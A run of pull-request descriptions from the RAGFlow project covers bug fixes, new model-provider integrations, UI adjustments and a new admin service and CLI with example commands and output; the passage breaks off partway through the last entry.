### What problem does this PR solve?
Feat: Adjust the style of the delete button on the agent side #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Google Cloud model does not work correctly with gemini-2.5 models
Close #10408
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Fixed the issue where swagger apidocs could not be opened
properly (#9522)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: virgilwong <hyhvirgil@gmail.com>
### What problem does this PR solve?
Feat: Added toc enhance field to chat and retrieval operator
configuration #10436
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Bug fixes #9869
- Adjusted the breadcrumb display logic on the data flow results page
- Added the default display of "Local Upload" to the Source field in the
dataset overview table
- Replaced the original Mindmap Task field with the GraphRAG Task field
on the dataset settings page
- Optimized the build button status check criteria and adjusted the
progress information display logic
- Introduced a Tooltip in the parsing status cell component and removed
redundant Button components
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#6193](https://github.com/infiniflow/ragflow/issues/6193)
change:
support qwq reasoning models with non-stream output
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed an issue where parser configurations could be added
infinitely #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the operator added by clicking the plus sign
in the data flow would overlap with the original section #9886
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add prompts for toc relevance check according to #10436
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: add total in List dataset API, solved #10360
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Running DeepDoc OCR on large PDFs inside the GPU docker-compose setup
would intermittently fail with
[ONNXRuntimeError] ... p2o.Clip.6 ... Available memory of 0 is smaller
than requested bytes ...
- Root cause: load_model() in deepdoc/vision/ocr.py passed
device_id=None through unchanged. The check
torch.cuda.device_count() > device_id then raised a TypeError, the
helper returned False, and ONNXRuntime quietly fell back to
CPUExecutionProvider with the hard-coded 512 MB limit, which then
triggered the allocator failure.
- Environment where this reproduces: Windows 11, AMD 5900x, 64 GB RAM,
RTX 3090 (24 GB), docker-compose-gpu.yml from upstream, default DeepDoc
+ GraphRAG parser settings, ingesting a heavy PDF such as
《内科学》(第10版).pdf (~180 MB).
Fixes:
- Normalize device_id to 0 when it is None before calling any CUDA APIs,
so the GPU path is considered available.
- Allow configuring the CUDA provider’s memory cap via
OCR_GPU_MEM_LIMIT_MB (default 2048 MB) and expose
OCR_ARENA_EXTEND_STRATEGY; the calculated byte
limit is logged to confirm the effective settings.
After the change, ragflow_server.log shows for example
load_model ... uses GPU (device 0, gpu_mem_limit=21474836480,
arena_strategy=kNextPowerOfTwo) and the same document finishes OCR
without allocator errors.
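The two fixes above can be sketched roughly as follows. This is a minimal illustration, not the code in deepdoc/vision/ocr.py: the helper name `cuda_provider_options` and the `kNextPowerOfTwo` fallback for `OCR_ARENA_EXTEND_STRATEGY` are assumptions, while the dictionary keys are the option names ONNX Runtime's CUDA execution provider accepts.

```python
import os


def cuda_provider_options(device_id=None, environ=None):
    """Build an options dict for ONNX Runtime's CUDAExecutionProvider.

    Hypothetical helper for illustration only.
    """
    env = os.environ if environ is None else environ
    # Normalize a missing device id to GPU 0 so later comparisons such as
    # `device_count > device_id` never see None.
    device_id = 0 if device_id is None else int(device_id)
    # Memory cap in MB (default 2048), converted to bytes for ONNX Runtime.
    limit_mb = int(env.get("OCR_GPU_MEM_LIMIT_MB", "2048"))
    # Assumed fallback; the PR text does not state the default strategy.
    strategy = env.get("OCR_ARENA_EXTEND_STRATEGY", "kNextPowerOfTwo")
    return {
        "device_id": device_id,
        "gpu_mem_limit": limit_mb * 1024 * 1024,
        "arena_extend_strategy": strategy,
    }
```

Under these assumptions, setting `OCR_GPU_MEM_LIMIT_MB=20480` yields a byte limit of 21474836480, which matches the value in the log line quoted above.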
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Importing data flow files from the list page #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Replace the collapse icon #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[#10417](https://github.com/infiniflow/ragflow/issues/10417)
change:
Adjusted the `searxng_url` priority logic to ensure the
frontend-provided URL takes precedence over the model’s default
configuration. This allows user-specified SearXNG endpoints to be
correctly applied during execution, improving flexibility across
different environments.
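A minimal sketch of the priority rule described above, assuming a hypothetical helper `resolve_searxng_url`; the real component's names and fallbacks may differ.

```python
def resolve_searxng_url(frontend_url, default_url):
    """Return the frontend-provided URL when it is non-empty, else the default.

    Hypothetical helper for illustration only.
    """
    candidate = (frontend_url or "").strip()
    # A user-specified endpoint always wins over the configured default.
    return candidate if candidate else default_url
```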
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the translation file of the workflow #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
**Adds a new feature that enables the LLM to extract a structured table
of contents (TOC) directly from plain text.**
_This implementation prioritizes efficiency over reasoning — the model
runs in a strictly deterministic mode (thinking disabled) to minimize
latency.
As a result, overall performance may be less optimal, but the extraction
speed and consistency are guaranteed._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### Related issues
#10078
### What problem does this PR solve?
Integrate DeerAPI provider.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
Co-authored-by: DeerAPI <tensor.null@gmail.com>
### What problem does this PR solve?
Hi team, @ZhenhangTung @KevinHuSh @cike8899
About #10384, I've completed the UI optimization adjustments for the
Agent page according to our previous discussions and the design draft
sketches provided by @Naomi. The main modifications include:
1. Adjusted the style and content of placeholder-node.
2. Adjusted the location of the dropdown (to the right of the
placeholder-node).
3. Adjusted the tooltip position spacing when the mouse hovers in the
dropdown menu.
4. Hid the thick scroll bar on the dropdown component.
5. Highlighted the connection line when dragging to generate a
placeholder-node.
<img width="1323" height="509" alt="Image"
src="https://github.com/user-attachments/assets/0d366f7f-477d-4c00-bb58-d5d58b3a745f"
/>
Please review the related code modifications when you have time. Let me
know if further adjustments are needed!
Thanks!
### Type of change
- [x] Other (please describe): UI Enhancement
---------
Co-authored-by: leonlai <leonlai@futurefab.ai>
### What problem does this PR solve?
- Admin service supports SHOW SERVICE <id>.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
issue: #10241
### What problem does this PR solve?
issue:
[Question]: New Chat Creation Renames Edited Chat Instead of Creating a
New One #10373
change:
reset chat state when creating new dialog
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Unexpected operation of document management.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add support for LongCat-Flash-Thinking and Claude Sonnet 4.5.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add support for international Dashscope service. #10340
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add baseUrl to the Tongyi Qianwen model configuration modal #10340
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
About issue #10140
In version 0.20.1, we implemented creating a new node through mouse
drag and drop. Showing an intermediate node (placeholder node) in
addition to the dropdown menu once the drag and drop completes, as the
workflow module in Coze does, could improve the user experience.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Admin client supports drop user.
Issue: #10241
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix unexpected operation of file management.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The dataset uses the new id to obtain the knowledge graph #10333
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR addresses [issue
#9962](https://github.com/infiniflow/ragflow/issues/9962).
It updates the Japanese translations in `web/src/locales/ja.ts`.
For this contribution, the scope is intentionally limited to **Chat**
and **Knowledge Base** related UI texts, ensuring focused and
incremental improvement without affecting other modules.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
These changes are intended to implement the remaining functionalities of
the fullscreen widget.
The question arises: how to display the document preview of PDFs in this
floating widget?
- simply enlarge the widget window
- implement zoom in/out
- render outside the iframe?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
#10326
change:
remove ibm-db dependency and refactor import order
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The enterprise version of the knowledge graph cannot be displayed.
#10333
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue: #5617
change: add IBM DB2 support in ExeSQL
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Rename the CometEmbed and CometSeq2txt classes to CometAPIEmbed and
CometAPISeq2txt, and correct supported_models.mdx.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Move base64 related function to api/common/base64.py
### Type of change
- [x] Refactoring
---------
Signed-off-by: jinhai <haijin.chn@gmail.com>
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Refactor import modules.
### Type of change
- [x] Refactoring
---------
Signed-off-by: jinhai <haijin.chn@gmail.com>
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fixed the issue where database connections were interrupted under high
concurrency
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: lemsn <lemsn@126.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Added "怎么办" to the regex pattern in rmWWW method to improve query
cleaning by removing this common question phrase along with other
question words.
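The idea can be illustrated with a much shorter pattern than the real one. The word list and the function name `strip_question_words` below are assumptions for illustration; they are not the actual regex in rmWWW.

```python
import re

# Hypothetical, shortened pattern; longer phrases come first so that
# "怎么办" is removed as a whole rather than partially.
QUESTION_WORDS = re.compile(r"(怎么办|怎么样|什么|如何)")


def strip_question_words(query):
    """Remove common question phrases, keeping the query if nothing is left."""
    cleaned = QUESTION_WORDS.sub("", query)
    return cleaned if cleaned.strip() else query
```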
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Admin client supports show user and create user commands.
- Admin client supports altering user password and active status.
- Admin client supports listing user datasets.
issue: #10241
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix invalid COMPONENT_EXEC_TIMEOUT. #10273
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Move base64 related function to api/common/base64.py
### Type of change
- [x] Refactoring
---------
Signed-off-by: jinhai <haijin.chn@gmail.com>
### What problem does this PR solve?
1. Fix typos
2. Rename function
3. Write comments in English
### Type of change
- [x] Refactoring
Signed-off-by: jinhai <haijin.chn@gmail.com>
…rsation_app.py
### What problem does this PR solve?
issue:
#10188
change:
This PR replaces traceback.print_exc() with logging.exception(e) in
conversation_app.py to ensure that full error tracebacks are captured by
the logging system instead of being written only to stderr.
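A minimal sketch of the pattern, assuming a hypothetical wrapper `run_safely` and logger name; the actual handlers in conversation_app.py are not reproduced here.

```python
import logging

# Hypothetical logger name for illustration.
logger = logging.getLogger("conversation_app_sketch")


def run_safely(action):
    """Run action(); on failure, log the error with its traceback, return None."""
    try:
        return action()
    except Exception as e:
        # logging.exception logs at ERROR level and appends the active
        # traceback, so it reaches every handler attached to the logger
        # rather than only stderr as traceback.print_exc() does.
        logger.exception(e)
        return None
```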
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix: Wrong Qwen model ID
[Bug]: ERROR: litellm.NotFoundError: DashscopeException - The model
Qwen/Qwen3-Omni-Flash does not exist or you do not have access to it.
change: delete wrong qwen model id
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Add Russian language
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[Bug]: ERROR: list index out of range #10188
change:
fix a potential list index out of range error in chat response parsing
by adding explicit checks for empty choices.
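A minimal sketch of such a guard, assuming a dict-shaped chat response and a hypothetical helper `first_choice_text`; the real parsing code may work on SDK objects instead.

```python
def first_choice_text(response):
    """Return the first choice's content, or "" when there are no choices.

    Hypothetical helper for illustration only.
    """
    choices = response.get("choices") or []
    if not choices:
        # Indexing choices[0] here would raise "list index out of range".
        return ""
    message = choices[0].get("message") or {}
    return message.get("content") or ""
```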
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Revert back to chat.completions.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [x] Other (please describe):
Revert back to chat.completions.
### What problem does this PR solve?
Currently, Azure OpenAI returns one-minute quota-limit responses when
the chat API is used. This change is needed in order to process almost
any document using models deployed in Azure Foundry.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix broken imports
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Signed-off-by: jinhai <haijin.chn@gmail.com>
### What problem does this PR solve?
An error occurred in the agent's Text Processing function when merging
strings that contain '\m'.
The fix converts '\m' to 'm' using a regular expression.
Judging from my example alone, this does not change the original
meaning; the result still reads as math.
<img width="1227" height="1056" alt="image"
src="https://github.com/user-attachments/assets/9306a8ca-bb97-47bf-b91f-77acfce49875"
/>
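One plausible reading of the failure, sketched under assumptions: Python's `re.sub` treats a replacement string containing a backslash followed by an unknown ASCII letter, such as `\m`, as a bad escape and raises `re.error`. The helper `fill_placeholder` and the `{name}` template syntax are hypothetical, and only `\m` is handled, as in the description above.

```python
import re


def fill_placeholder(template, name, value):
    """Substitute {name} in template with value, dropping the backslash in '\\m'.

    Hypothetical helper for illustration only.
    """
    # Turn "\m" into "m" so the replacement string has no invalid escape.
    safe_value = re.sub(r"\\m", "m", value)
    return re.sub(r"\{%s\}" % re.escape(name), safe_value, template)
```

Without the first substitution, a call such as `re.sub(r"\{v\}", r"\mu", "x = {v}")` raises `re.error`.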
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: mxc <mxc@example.com>
### What problem does this PR solve?
Fix: resolve hash collisions by switching to UUID & correct logic for
always-true statements, solved: #10165
Feat: Update GPT api integration, solved: #10204
Feat: Support qianwen-deepresearch, solved: #10163
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add tree_merge for law parsers, significantly outperforming
hierarchical_merge, solved: #8637
1. Add tree_merge for law parsers, including build_tree and get_tree
(via DFS).
2. Add copyright statement for health_utils
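The general shape of a tree-based merge can be sketched as below. This is an illustration under assumptions, not the PR's implementation: the `Node` class, the `(level, text)` input format, and the way leaves are joined with their ancestor headings are all hypothetical; only the names `build_tree` and `get_tree` come from the description.

```python
from dataclasses import dataclass, field


@dataclass
class Node:
    level: int
    text: str
    children: list = field(default_factory=list)


def build_tree(lines):
    """Build a tree from (level, text) pairs; a smaller level is a higher heading."""
    root = Node(0, "")
    stack = [root]
    for level, text in lines:
        node = Node(level, text)
        # Pop until the top of the stack is a strict ancestor of this node.
        while stack[-1].level >= level:
            stack.pop()
        stack[-1].children.append(node)
        stack.append(node)
    return root


def get_tree(node, path=()):
    """Depth-first walk returning one merged string per leaf, with its ancestors."""
    here = path + (node.text,) if node.text else path
    if not node.children:
        return [" ".join(here)] if here else []
    chunks = []
    for child in node.children:
        chunks.extend(get_tree(child, here))
    return chunks
```

Each resulting chunk carries its chapter and article headings, which is one way a tree merge can keep more context than a flat hierarchical merge.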
### Type of change
- [x] Documentation Update
- [x] Performance Improvement
### What problem does this PR solve?
Add a chat widget. I'll probably need some assistance to get this ready
for merge!
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Mohamed Mathari <nocodeventure@Mac-mini-van-Mohamed.fritz.box>
### What problem does this PR solve?
Introduce new feature: RAGFlow system admin service and CLI
### Introduction
Admin Service is a dedicated management component designed to monitor,
maintain, and administrate the RAGFlow system. It provides comprehensive
tools for ensuring system stability, performing operational tasks, and
managing users and permissions efficiently.
The service offers monitoring of critical components, including the
RAGFlow server, Task Executor processes, and dependent services such as
MySQL, Infinity / Elasticsearch, Redis, and MinIO. It automatically
checks their health status, resource usage, and uptime, and performs
restarts in case of failures to minimize downtime.
For user and system management, it supports listing, creating,
modifying, and deleting users and their associated resources like
knowledge bases and Agents.
Built with scalability and reliability in mind, the Admin Service
ensures smooth system operation and simplifies maintenance workflows.
It consists of a server-side Service and a command-line client (CLI),
both implemented in Python. User commands are parsed using the Lark
parsing toolkit.
- **Admin Service**: A backend service that interfaces with the RAGFlow
system to execute administrative operations and monitor its status.
- **Admin CLI**: A command-line interface that allows users to connect
to the Admin Service and issue commands for system management.
### Starting the Admin Service
1. Before starting the Admin Service, make sure the RAGFlow system is
already running.
2. Run the service script:
```bash
python admin/admin_server.py
```
The service will start and listen for incoming connections from the CLI
on the configured port.
### Using the Admin CLI
1. Ensure the Admin Service is running.
2. Launch the CLI client:
```bash
python admin/admin_client.py -h 0.0.0.0 -p 9381
```
## Supported Commands
Commands are case-insensitive and must be terminated with a semicolon
(`;`).
### Service Management Commands
- [x] `LIST SERVICES;`
- Lists all available services within the RAGFlow system.
- [ ] `SHOW SERVICE <id>;`
- Shows detailed status information for the service identified by
`<id>`.
- [ ] `STARTUP SERVICE <id>;`
- Attempts to start the service identified by `<id>`.
- [ ] `SHUTDOWN SERVICE <id>;`
- Attempts to gracefully shut down the service identified by `<id>`.
- [ ] `RESTART SERVICE <id>;`
- Attempts to restart the service identified by `<id>`.
### User Management Commands
- [x] `LIST USERS;`
- Lists all users known to the system.
- [ ] `SHOW USER '<username>';`
- Shows details and permissions for the specified user. The username
must be enclosed in single or double quotes.
- [ ] `DROP USER '<username>';`
- Removes the specified user from the system. Use with caution.
- [ ] `ALTER USER PASSWORD '<username>' '<new_password>';`
- Changes the password for the specified user.
### Data and Agent Commands
- [ ] `LIST DATASETS OF '<username>';`
- Lists the datasets associated with the specified user.
- [ ] `LIST AGENTS OF '<username>';`
- Lists the agents associated with the specified user.
### Meta-Commands
Meta-commands are prefixed with a backslash (`\`).
- `\?` or `\help`
- Shows help information for the available commands.
- `\q` or `\quit`
- Exits the CLI application.
## Examples
```commandline
admin> list users;
+-------------------------------+------------------------+-----------+-------------+
| create_date | email | is_active | nickname |
+-------------------------------+------------------------+-----------+-------------+
| Fri, 22 Nov 2024 16:03:41 GMT | jeffery@infiniflow.org | 1 | Jeffery |
| Fri, 22 Nov 2024 16:10:55 GMT | aya@infiniflow.org | 1 | Waterdancer |
+-------------------------------+------------------------+-----------+-------------+
admin> list services;
+-------------------------------------------------------------------------------------------+-----------+----+---------------+-------+----------------+
| extra | host | id | name | port | service_type |
+-------------------------------------------------------------------------------------------+-----------+----+---------------+-------+----------------+
| {} | 0.0.0.0 | 0 | ragflow_0 | 9380 | ragflow_server |
| {'meta_type': 'mysql', 'password': 'infini_rag_flow', 'username': 'root'} | localhost | 1 | mysql | 5455 | meta_data |
| {'password': 'infini_rag_flow', 'store_type': 'minio', 'user': 'rag_flow'} | localhost | 2 | minio | 9000 | file_store |
| {'password': 'infini_rag_flow', 'retrieval_type': 'elasticsearch', 'username': 'elastic'} | localhost | 3 | elasticsearch | 1200 | retrieval |
| {'db_name': 'default_db', 'retrieval_type': 'infinity'} | localhost | 4 | infinity | 23817 | retrieval |
| {'database': 1, 'mq_type': 'redis', 'password': 'infini_rag_flow'} | localhost | 5 | redis | 6379 | message_queue |
+-------------------------------------------------------------------------------------------+-----------+----+---------------+-------+----------------+
```
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Signed-off-by: jinhai <haijin.chn@gmail.com>
### What problem does this PR solve?
This PR is related to
[#9961](https://github.com/infiniflow/ragflow/issues/9961).
In the Chat Settings screen, the textarea did not support scrolling when
the content grew longer than its visible area, which made it less
convenient to use.
Also, there was no Japanese placeholder text to guide users on what to
enter in the field.
This PR improves the user experience by:
- Adding `overflow-y-auto` to the textarea so that long content can be
scrolled smoothly.
- Introducing a placeholder (`メッセージを入力してください...`) to provide clearer
guidance for users.
https://github.com/user-attachments/assets/95553331-087b-42c5-a41d-5dfe08047bae
### What has been considered
As an alternative solution, I explored replacing the textarea with the
existing `PromptEditor` component.
However, this approach triggered a `canvas not found.` alert.
The current implementation of `PromptEditor` internally attempts to
fetch **agent (canvas) information**, but in the Chat Settings screen no
such ID exists. As a result, the API call fails and the backend returns
`canvas not found.`.
One possible workaround would be to extend `PromptEditor` with a
**“disable variable picker” flag**, ensuring that plugins are not loaded
in contexts like Chat Settings. While feasible, this would have a
broader impact across the codebase.
Given these considerations, I decided to address the issue in a simpler
way by applying a Tailwind utility (`overflow-y-auto`). Since the UI
design is expected to change in the future, this solution is considered
sufficient for now.
<img width="1501" height="794" alt="Screenshot 2025-09-20 at 15 00 12"
src="https://github.com/user-attachments/assets/85578ee8-489f-4ede-b3af-bafd7afe95bd"
/>
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Skip `tag_query` step if `tag_kbs` are empty.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[Bug]: anthropic model have not baseurl selecting,need add #8546
change:
This PR adds support for using Anthropic models through a third-party
API by allowing a custom base_url.
It ensures compatibility with both the official Anthropic endpoint and
external providers.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix the rerank_model condition logic by correcting the np.isclose check.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Support server health check. Solved issue: #10106
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add a file-to-document conversion API, just like file2document_app.py
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the knowledge base's embedded model form layout and
dependency imports in the main branch.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Migrate OpenAI-compatible chats to LiteLLM.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Merge different types of models from the same manufacturer #10146
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Handle zero and nan in calculate.
#10125
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Related PR:
Feat: add CometAPI to LLMFactory and update related mappings #10119
Change:
Fixes the issue where the embedding model in CometAPI was not being
called correctly
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: TensorNull <tensor.null@gmail.com>
### What problem does this PR solve?
Add support for KB document basic info
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### Related issues
#10078
### What problem does this PR solve?
Integrate CometAPI provider.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
The original text for vectorSimilarityWeight in Chinese version was
"相似度相似度权重," which is obviously a malformed phrase. It has now been
changed to "向量相似度权重". Also, align it with the English version 'Vector
similarity weight'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Support image recognition with image links in markdown files, solved
issue: #8755
Fixed log info error in code_exec, solved issue: #10064
### Type of change (8755)
- [x] New Feature (non-breaking change which adds functionality)
### Type of change (10064)
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Dataflow supports audio. Also fixes giteeAI's sequence2text model.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
An exception happens if you give session_id to agent_open_ai completion,
because session_id is passed explicitly as well as inside **req, so it
is sent twice. The logic for picking one of session_id, id, and
metadata.id also seemed odd, so it was cleaned up a little.
See #10111
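The duplicate-keyword failure can be reproduced with a small sketch. The function names and signatures below are hypothetical stand-ins, not the actual API; the selection between session_id, id, and metadata.id is not shown.

```python
def completion(tenant_id, agent_id, session_id=None, **kwargs):
    """Hypothetical stand-in for the completion call."""
    return {"session_id": session_id, "extra": kwargs}


def call_completion(tenant_id, agent_id, req):
    """Forward req without passing session_id twice."""
    payload = dict(req)  # copy so the caller's dict is left untouched
    # Take session_id out of the payload before spreading it as keywords.
    # completion(..., session_id=req["session_id"], **req) would raise
    # TypeError: got multiple values for keyword argument 'session_id'.
    session_id = payload.pop("session_id", None)
    return completion(tenant_id, agent_id, session_id=session_id, **payload)
```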
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR fixes incorrect naming for PostgreSQL usage by replacing all
instances of `postgresql` with the correct `postgres` in the `db_type`
field. This resolves potential configuration errors and ensures
consistency when specifying the database type.
Also fixed handling of None for `get_queue_length`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: cucusenok <BP-116: updated readme.md>
### What problem does this PR solve?
issue:
[Bug]: Agent component (HTTP Request) "'>' not supported between
instances of 'int' and 'NoneType'"
[#10096](https://github.com/infiniflow/ragflow/issues/10096)
Change:
When the Invoke class instantiates HtmlParser without providing the
chunk_token_num parameter, the value defaults to None, leading to a
comparison error with block_token_count.
This change sets the default chunk_token_num to 512 to prevent such
errors.
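A minimal sketch of the comparison and the default, assuming a hypothetical helper `needs_new_chunk`; HtmlParser's real signature is not reproduced here.

```python
DEFAULT_CHUNK_TOKEN_NUM = 512


def needs_new_chunk(block_token_count, chunk_token_num=None):
    """Return True when the current block exceeds the chunk token budget.

    Hypothetical helper for illustration only.
    """
    if chunk_token_num is None:
        # Without this fallback, `int > None` raises
        # TypeError: '>' not supported between instances of 'int' and 'NoneType'.
        chunk_token_num = DEFAULT_CHUNK_TOKEN_NUM
    return block_token_count > chunk_token_num
```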
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: BadwomanCraZY <511528396@qq.com>
### What problem does this PR solve?
Support parsing images by OCR or VLM.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add support for the Ascend table structure recognizer.
Use the environment variable `TABLE_STRUCTURE_RECOGNIZER_TYPE=ascend` to
enable the Ascend table structure recognizer.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Updated SQL assistant template to wrap variables like 'sys.query' and
'Agent:WickedGoatsDivide@content' in curly braces for better template
variable syntax consistency.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Supports Ascend layout recognizer.
Use the environment variable `LAYOUT_RECOGNIZER_TYPE=ascend` to enable
the Ascend layout recognizer, and `ASCEND_LAYOUT_RECOGNIZER_DEVICE_ID=n`
(for example, n=0) to specify the Ascend device ID.
Ensure that you have installed the [ais
tools](https://gitee.com/ascend/tools/tree/master/ais-bench_workload/tool/ais_bench)
properly.
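Reading these two variables could look roughly like this. The helper name `layout_recognizer_settings`, the `"onnx"` fallback type, and the default device ID of 0 are assumptions for illustration.

```python
import os


def layout_recognizer_settings(environ=None):
    """Resolve the layout recognizer type and, for Ascend, the device ID.

    Hypothetical helper for illustration only.
    """
    env = os.environ if environ is None else environ
    # Assumed fallback type when the variable is unset.
    kind = env.get("LAYOUT_RECOGNIZER_TYPE", "onnx").lower()
    # Assumed default device 0; only meaningful for the Ascend recognizer.
    device_id = int(env.get("ASCEND_LAYOUT_RECOGNIZER_DEVICE_ID", "0"))
    return {"type": kind, "device_id": device_id if kind == "ascend" else None}
```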
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Check that the session is not empty before deleting it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The same model appears twice in the drop-down box. #10102
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
…release workflow (#10039)
This change updates the GitHub Actions workflow to push additional
stable tags alongside version tags, enabling automated update tools like
Watchtower to detect and pull the latest images correctly.
Refs:
[https://github.com/infiniflow/ragflow/issues/10039](https://github.com/infiniflow/ragflow/issues/10039)
### What problem does this PR solve?
Automated container update tools such as Watchtower rely on stable tags
like `latest` to identify the newest images. Previously, only
version-specific tags were pushed, which prevented these tools from
detecting new releases automatically. This PR adds multiple stable tags
(`latest-full`, `latest-slim`) alongside version tags to the Docker
image publishing workflow, ensuring smooth and reliable automated
updates without manual tag management.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
### What problem does this PR solve?
Terminate the ONNX inference session and release memory manually.
Issue #5050
Issue #9992
Issue #8805
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Translate the fields of the embedded dialog box on the agent page
#3221
### Type of change
